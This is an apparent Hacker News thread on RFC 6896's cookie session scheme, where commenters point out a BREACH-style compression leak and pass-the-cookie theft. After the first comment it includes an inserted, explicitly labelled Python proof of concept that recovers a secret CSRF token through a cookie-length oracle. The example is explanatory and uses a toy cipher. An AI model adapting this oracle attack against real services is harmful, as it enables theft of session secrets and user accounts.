
RFC 6896 – Secure Cookie Sessions for HTTP - dedalus
https://tools.ietf.org/html/rfc6896
======
kpcyrd
It seems this has all the disadvantages of jwt-style sessions, plus a BREACH-style
vulnerability in the crypto due to compression if `plain-text-cookie-value`
contains data an attacker can taint.
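
The leak kpcyrd is pointing at, shown as an added example (not code from the thread, from RFC 6896, or from the KoanLogic SCS implementation): the session state is Deflate-compressed before it is encrypted, so a value the attacker can inject into the state shares a compression window with the secret, and a guess that matches the next secret byte shortens the output. Assumptions, all constructed for this demo: the state layout `uid=…;csrf=…;q=<attacker value>`, a 16-byte-block CBC cipher with PKCS#7 padding (a keyed-XOR stand-in that only reproduces AES-CBC's output length), a fixed-size MAC tag, and an attacker who can observe the cookie's length. CBC padding coarsens the oracle to 16-byte steps, so the attacker sweeps a trailing filler until the one-byte saving crosses a block boundary.

```python
"""Length oracle against a compress-then-encrypt session cookie (added example).

Assumed SCS-like pipeline: Deflate -> PKCS#7 pad to 16-byte blocks -> CBC-mode
block cipher with a 16-byte IV -> MAC tag, with the session state holding a
secret next to a value the attacker can taint. The cipher is a keyed-XOR
stand-in for AES-CBC that only reproduces the output length; key, secret and
state layout are constructed for this demo.
"""
import base64
import hashlib
import hmac
import os
import string
import zlib

BLOCK = 16
KEY = os.urandom(32)              # server-side key, never seen by the attacker
SECRET_CSRF = "a7Q2z"             # constructed secret the attacker wants
ALPHABET = string.ascii_letters + string.digits
FILLER = "~!@#$%^&*()_+[]{}"      # distinct bytes that occur nowhere else in the state


def session_state(attacker_field: str) -> bytes:
    """Server-side session state: a secret beside an attacker-tainted value."""
    return f"uid=42;csrf={SECRET_CSRF};q={attacker_field}".encode()


def compressed_len(attacker_field: str) -> int:
    """Deflate output length before padding and encryption."""
    return len(zlib.compress(session_state(attacker_field)))


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def toy_cbc_encrypt(plaintext: bytes) -> bytes:
    """Stand-in for AES-CBC: IV || pad(pt) XOR keystream. Same length as the
    real thing, which is all the attack needs; not a secure cipher."""
    iv = os.urandom(BLOCK)
    padded = pkcs7_pad(plaintext)
    chunks = len(padded) // 32 + 1
    keystream = b"".join(hashlib.sha256(KEY + iv + i.to_bytes(4, "big")).digest()
                         for i in range(chunks))
    return iv + bytes(a ^ b for a, b in zip(padded, keystream))


def make_cookie(attacker_field: str) -> str:
    """SCS-style token: base64(IV || ciphertext) '.' base64(tag)."""
    ct = toy_cbc_encrypt(zlib.compress(session_state(attacker_field)))
    tag = hmac.new(KEY, ct, hashlib.sha256).digest()
    return base64.b64encode(ct).decode() + "." + base64.b64encode(tag).decode()


def oracle(attacker_field: str) -> int:
    """What the attacker observes: the cookie length (Set-Cookie size or TLS
    record size) for a value they injected into the session."""
    return len(make_cookie(attacker_field))


def recover_secret(oracle, prefix: str = "csrf=", length: int = len(SECRET_CSRF)) -> str:
    """Recover the secret byte by byte. A correct guess extends Deflate's
    back-reference and saves one byte; CBC padding hides that unless the byte
    crosses a block boundary, so a trailing filler is swept until exactly one
    candidate yields a shorter cookie."""
    recovered = ""
    for _ in range(length):
        winner = None
        for f in range(BLOCK):
            lengths = {g: oracle(prefix + recovered + g + FILLER[:f]) for g in ALPHABET}
            shortest = min(lengths.values())
            winners = [g for g, n in lengths.items() if n == shortest]
            if len(winners) == 1:
                winner = winners[0]
                break
        if winner is None:
            raise RuntimeError("no unique shortest candidate at this position")
        recovered += winner
    return recovered


if __name__ == "__main__":
    print("compressed length, right vs wrong first byte:",
          compressed_len("csrf=a"), compressed_len("csrf=b"))
    print("recovered:", recover_secret(oracle))
```

The secret is kept to five bytes so every back-reference stays within Deflate's extra-bit-free length codes and the saving is exactly one byte per correct guess; longer secrets need the bit-alignment tricks from the BREACH paper but leak all the same. Nothing about the MAC or the cipher key helps here, since the leak is in the length the attacker sees, not in the bytes.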

~~~
tptacek
Yeah, I'm pretty confused by this being on the front page.

------
jamieson-becker
@moderators should probably be marked [2013]

------
chrismorgan
A better title:

RFC 6896 - SCS: KoanLogic's Secure Cookie Sessions for HTTP [2013]

~~~
jedisct1
A better better title: RFC 6896 - SCS: KoanLogic's Insecure Cookie Sessions
for HTTP [2013]

------
kerng
This doesn't seem to protect from Pass the Cookie attacks.

Edit - it's a common red teaming tactic:
[https://wunderwuzzi23.github.io/blog/passthecookie.html](https://wunderwuzzi23.github.io/blog/passthecookie.html)

~~~
0xfffff
Correct, it doesn't. If you grab that cookie and then pass the cookie from
somewhere else, it will work.

Section 7.2.3 talks about cookie theft.

~~~
kerng
Yeah, as others have pointed out, this RFC is from 2013 - so a bit dated.

